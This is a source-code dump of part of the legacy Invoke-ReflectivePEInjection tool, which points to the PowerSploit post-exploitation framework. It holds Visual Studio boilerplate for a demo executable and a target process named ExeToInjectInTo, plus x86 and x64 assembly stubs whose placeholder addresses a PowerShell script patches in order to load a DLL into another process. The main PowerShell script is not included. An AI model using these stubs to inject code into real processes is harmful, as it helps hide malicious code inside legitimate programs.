8 | make up your DemoExe_MD application.
9 |
10 |
11 | DemoExe_MD.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoExe_MD.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoExe_MD.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoExe_MD.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MD/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoExe_MD.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MD/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MD/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MDd/DemoExe_MDd.cpp:
--------------------------------------------------------------------------------
1 | // DemoExe.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
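// Entry point of the demo executable.
//
// Going by its banner, this is a smoke test: it prints argc, the address of
// argv and every argv[] entry, then exits with status 0, so whoever launched
// the program can confirm the command line reached it intact. All output goes
// through the byte-oriented printf family so stdout's orientation is never
// switched part-way through (the original mixed printf and wprintf).
//
// Assumes _TCHAR is wchar_t, i.e. the project's Unicode character-set setting;
// under an MBCS build the %ls conversion below would be wrong.
int _tmain(int argc, _TCHAR* argv[])
{
    printf("Exe loaded! Printing argc and argv\n\n");

    printf("Argc: %d\n", argc);
    // %p is the only correct conversion for a pointer; %d truncates it on
    // 64-bit builds and is undefined behaviour in any case.
    printf("ArgvAddress: %p\n", (void*)argv);

    for (int i = 0; i < argc; i++)
    {
        // %ls names a wchar_t string explicitly, whichever printf variant is used.
        printf("Argv: %ls\n", argv[i]);
    }

    printf("Exiting exe\n");

    return 0;
}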
25 |
26 |
27 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}
23 | Win32Proj
24 | DemoExe_MDd
25 |
26 |
27 |
28 | Application
29 | true
30 | v110
31 | Unicode
32 |
33 |
34 | Application
35 | true
36 | v110
37 | Unicode
38 |
39 |
40 | Application
41 | false
42 | v110
43 | true
44 | Unicode
45 |
46 |
47 | Application
48 | false
49 | v110
50 | true
51 | Unicode
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
87 | true
88 |
89 |
90 | Console
91 | true
92 |
93 |
94 |
95 |
96 | Use
97 | Level3
98 | Disabled
99 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
100 | true
101 |
102 |
103 | Console
104 | true
105 |
106 |
107 |
108 |
109 | Level3
110 | Use
111 | MaxSpeed
112 | true
113 | true
114 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
115 | true
116 |
117 |
118 | Console
119 | true
120 | true
121 | true
122 |
123 |
124 |
125 |
126 | Level3
127 | Use
128 | MaxSpeed
129 | true
130 | true
131 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 | Create
152 | Create
153 | Create
154 | Create
155 |
156 |
157 |
158 |
159 |
160 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MDd/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : DemoExe_MDd Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoExe_MDd application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoExe_MDd application.
9 |
10 |
11 | DemoExe_MDd.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoExe_MDd.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoExe_MDd.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoExe_MDd.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MDd/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoExe_MDd.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MDd/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MDd/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/ExeToInjectInTo/ExeToInjectInTo.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExeToInjectInTo", "ExeToInjectInTo\ExeToInjectInTo.vcxproj", "{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Release|Win32 = Release|Win32
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.ActiveCfg = Debug|Win32
13 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.Build.0 = Debug|Win32
14 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.ActiveCfg = Release|Win32
15 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.Build.0 = Release|Win32
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.cpp:
--------------------------------------------------------------------------------
1 | // ExeToInjectInTo.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
// Entry point of the host test executable.
//
// The program does nothing except announce itself and then block on stdin
// until a line is entered, which keeps the process alive with a trivial,
// predictable body for as long as it is needed. Always exits with status 0;
// argc and argv are ignored.
int _tmain(int argc, _TCHAR* argv[])
{
    printf("Press enter to close.\n");
    (void)getchar(); // wait for a keypress; the character itself is irrelevant
    return 0;
}
16 |
17 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 |
14 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}
15 | Win32Proj
16 | ExeToInjectInTo
17 |
18 |
19 |
20 | Application
21 | true
22 | v110
23 | Unicode
24 |
25 |
26 | Application
27 | false
28 | v110
29 | true
30 | Unicode
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 | true
44 |
45 |
46 | false
47 |
48 |
49 |
50 | Use
51 | Level3
52 | Disabled
53 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
54 | true
55 |
56 |
57 | Console
58 | true
59 |
60 |
61 |
62 |
63 | Level3
64 | Use
65 | MaxSpeed
66 | true
67 | true
68 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
69 | true
70 |
71 |
72 | Console
73 | true
74 | true
75 | true
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 | Create
89 | Create
90 |
91 |
92 |
93 |
94 |
95 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/ExeToInjectInTo/ExeToInjectInTo/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : ExeToInjectInTo Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this ExeToInjectInTo application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your ExeToInjectInTo application.
9 |
10 |
11 | ExeToInjectInTo.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | ExeToInjectInTo.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | ExeToInjectInTo.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named ExeToInjectInTo.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/ExeToInjectInTo/ExeToInjectInTo/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // ExeToInjectInTo.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/ExeToInjectInTo/ExeToInjectInTo/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/ExeToInjectInTo/ExeToInjectInTo/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/README.md:
--------------------------------------------------------------------------------
1 | The tools in this directory are part of PowerSploit and are being maintained there. They are preserved here for legacy, but any bug fixes should be checked in to PowerSploit.
2 |
3 | https://github.com/mattifestation/PowerSploit
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/Shellcode/readme.txt:
--------------------------------------------------------------------------------
1 | This directory contains the assembly code I used to build the shellcode the PowerShell script uses. Some of the assembly isn't included because I didn't save it; the missing pieces should only be the SUPER easy stuff, like moving an address to EAX and returning.
2 |
3 | Compile:
4 | x64:
5 | nasm -f elf64 FileName.asm
6 | ld -o FileName FileName.o
7 | objdump -M intel -d FileName
8 |
9 | x86:
10 | nasm FileName.asm
11 | ld -o FileName FileName.o
12 | objdump -M intel -d FileName
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/Shellcode/x64/CallDllMain.asm:
--------------------------------------------------------------------------------
; x64 stub: call a DLL entry point once with the DLL_PROCESS_ATTACH reason and
; return to the caller.
;
; Every 0x4141414141414141 immediate is a placeholder that the PowerShell
; script overwrites with a real value before these bytes run (see the per-line
; comments). NOTE(review): presumably the script patches them by byte offset,
; so confirm before reordering or resizing any instruction here.
[SECTION .text]
global _start

_start:
    ; Get stack setup: save rbx (callee-saved) and the incoming rsp, then align
    ; the stack by clearing the low byte of sp. Only the 16-bit sp is ANDed, so
    ; bits 16-63 of rsp are untouched.
    push rbx
    mov rbx, rsp
    and sp, 0xff00

    ; Call DllMain with the Win64 register convention (rcx, rdx, r8).
    mov rcx, 0x4141414141414141 ; DLLHandle (hinstDLL), set by PowerShell
    mov rdx, 0x1 ; PROCESS_ATTACH (DLL_PROCESS_ATTACH == 1)
    mov r8, 0x0 ; NULL (lpReserved)
    mov rax, 0x4141414141414141 ; Address of DllMain, set by PS
    call rax

    ; Fix stack: restore the saved rsp and rbx and return to the caller.
    ; DllMain's return value in rax is not inspected here.
    mov rsp, rbx
    pop rbx
    ret
21 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/Shellcode/x64/ExitThread.asm:
--------------------------------------------------------------------------------
; x64 stub: flag to the PowerShell script that the program is finishing, then
; transfer control to an exit routine (per the comment below, ExitThread rather
; than ExitProcess) and never return.
;
; Both 0x4141414141414141 immediates are placeholders the script fills in.
[SECTION .text]

global _start

_start:
    ; Set a var to 1, let PS know the exe is exiting: write the byte 1 to an
    ; address supplied by PS.
    mov rbx, 0x4141414141414141 ; Address of the flag byte, set by PS
    mov [rbx], byte 0x01

    ; Call exitthread instead of exitprocess. rsp is moved down 0xc0 bytes and
    ; then 16-byte aligned (low 4 bits of sp cleared) before the call. There is
    ; no code after the call: the callee is expected not to return.
    sub rsp, 0xc0
    and sp, 0xFFf0 ; Needed for stack alignment
    mov rbx, 0x4141414141414141 ; Address of the exit function, set by PS
    call rbx
15 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/Shellcode/x64/GetFuncAddress.asm:
--------------------------------------------------------------------------------
; x64 stub: resolve one export via GetProcAddress(hModule, name), store the
; returned address into a result buffer, and return to the caller.
;
; The four 0x4141414141414141 immediates are placeholders the PowerShell
; script fills in (module handle, name pointer, GetProcAddress address and
; result buffer).
[SECTION .text]

global _start

_start:
    ; Save state of rbx and stack: rbx is callee-saved and keeps the original
    ; rsp so the stack can be restored exactly after the call.
    push rbx
    mov rbx, rsp

    ; Set up stack for function call to GetProcAddress: reserve the 0x20 bytes
    ; the Win64 convention expects the caller to leave below the return
    ; address, then align by clearing the low 6 bits of sp.
    sub rsp, 0x20
    and sp, 0xffc0

    ; Call getprocaddress with the Win64 register convention (rcx, rdx).
    mov rcx, 0x4141414141414141 ; DllHandle, set by PS
    mov rdx, 0x4141414141414141 ; Ptr to FuncName string, set by PS
    mov rax, 0x4141414141414141 ; GetProcAddress address, set by PS
    call rax

    ; Store the result: write the 8-byte return value in rax to the buffer.
    mov rcx, 0x4141414141414141 ; Ptr to buffer to save result, set by PS
    mov [rcx], rax

    ; Restore stack and rbx, then return to the caller.
    mov rsp, rbx
    pop rbx
    ret
28 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/Shellcode/x64/LoadLibraryA.asm:
--------------------------------------------------------------------------------
; x64 stub: call LoadLibraryA(name), store the returned module handle into a
; result buffer, and return to the caller.
;
; The three 0x4141414141414141 immediates are placeholders the PowerShell
; script fills in (name pointer, LoadLibraryA address and result buffer).
[SECTION .text]

global _start

_start:
    ; Save rsp and setup stack for function call: rbx (callee-saved) keeps the
    ; original rsp; 0x20 bytes are reserved below the return address as the
    ; Win64 convention requires, then sp is aligned by clearing its low 6 bits.
    push rbx
    mov rbx, rsp
    sub rsp, 0x20
    and sp, 0xffc0

    ; Call LoadLibraryA with its single argument in rcx.
    mov rcx, 0x4141414141414141 ; Ptr to string of library, set by PS
    mov rdx, 0x4141414141414141 ; Address of LoadLibrary, set by PS
    call rdx

    ; Write the 8-byte return value (rax) to the result buffer.
    mov rdx, 0x4141414141414141 ; Ptr to save result, set by PS
    mov [rdx], rax

    ; Fix stack: restore rsp and rbx, then return to the caller.
    mov rsp, rbx
    pop rbx
    ret
24 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/Shellcode/x86/CallDllMain.asm:
--------------------------------------------------------------------------------
; x86 stub: call a DLL entry point once with the DLL_PROCESS_ATTACH reason and
; return to the caller.
;
; Both 0x41414141 immediates are placeholders the PowerShell script fills in.
; NOTE(review): presumably the script patches them by byte offset, so confirm
; before reordering or resizing any instruction here.
[SECTION .text]
global _start

_start:
    ; Get stack setup: save ebx (callee-saved) and the incoming esp, then
    ; 16-byte align the stack.
    push ebx
    mov ebx, esp
    and esp, 0xfffffff0

    ; Call DllMain. The arguments are pushed right to left, giving
    ; DllMain(DLLHandle, 1, NULL).
    mov ecx, 0x41414141 ; DLLHandle, set by PowerShell
    mov edx, 0x1 ; PROCESS_ATTACH (DLL_PROCESS_ATTACH == 1)
    mov eax, 0x0 ; NULL (lpReserved)
    push eax
    push edx
    push ecx
    mov eax, 0x41414141 ; Address of DllMain, set by PS
    call eax

    ; Fix stack: restoring esp from ebx discards the pushed arguments whether
    ; or not the callee popped them, then restore ebx and return to the caller.
    mov esp, ebx
    pop ebx
    ret
24 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/Shellcode/x86/ExitThread.asm:
--------------------------------------------------------------------------------
; x86 stub: flag to the PowerShell script that the program is finishing, then
; transfer control to an exit routine (per the comment below, ExitThread rather
; than ExitProcess) and never return.
;
; Both 0x41414141 immediates are placeholders the script fills in.
[SECTION .text]
global _start

_start:
    ; Set a var to 1, let PS know the EXE is exiting: write the byte 1 to an
    ; address supplied by PS.
    mov ebx, 0x41414141 ; Address of the flag byte, set by PS
    mov [ebx], byte 0x01

    ; Call exitthread instead of exit process. esp is moved down 0x20 bytes and
    ; then aligned by clearing its low 6 bits before the call. There is no code
    ; after the call: the callee is expected not to return.
    sub esp, 0x20
    and esp, 0xFFFFFFc0 ; Needed for stack alignment
    mov ebx, 0x41414141 ; Address of the exit function, set by PS
    call ebx
14 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/Shellcode/x86/GetProcAddress.asm:
--------------------------------------------------------------------------------
; x86 stub: resolve one export via GetProcAddress(hModule, name), store the
; returned address at an address supplied by the PowerShell script, and return
; to the caller.
;
; The four 0x41414141 immediates are placeholders the script fills in (module
; handle, name pointer, GetProcAddress address and result address).
[SECTION .text]

global _start

_start:
    ; Save state of ebx and stack: ebx is callee-saved and keeps the original
    ; esp so the stack can be restored exactly after the call.
    push ebx
    mov ebx, esp

    ; Align stack by clearing the low 6 bits of esp.
    and esp, 0xffffffc0

    ; Call GetProcAddress. Arguments are pushed right to left, giving
    ; GetProcAddress(DllHandle, FunctionName).
    mov eax, 0x41414141 ; DllHandle, supplied by PS
    mov ecx, 0x41414141 ; Function name, supplied by PS
    push ecx
    push eax
    mov eax, 0x41414141 ; GetProcAddress address, supplied by PS
    call eax

    ; Write GetProcAddress return value (eax) to an address supplied by PS.
    mov ecx, 0x41414141 ; Address supplied by PS
    mov [ecx], eax

    ; Fix stack: restoring esp from ebx discards the pushed arguments whether
    ; or not the callee popped them, then restore ebx and return to the caller.
    mov esp, ebx
    pop ebx
    ret
29 |
--------------------------------------------------------------------------------
/Invoke-TokenManipulation/README.md:
--------------------------------------------------------------------------------
1 | The tools in this directory are part of PowerSploit and are being maintained there. They are preserved here for legacy, but any bug fixes should be checked in to PowerSploit.
2 |
3 | https://github.com/mattifestation/PowerSploit
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | The tools in this directory are part of PowerSploit and are being maintained there. They are preserved here for legacy, but any bug fixes should be checked in to PowerSploit.
2 |
3 | https://github.com/mattifestation/PowerSploit
--------------------------------------------------------------------------------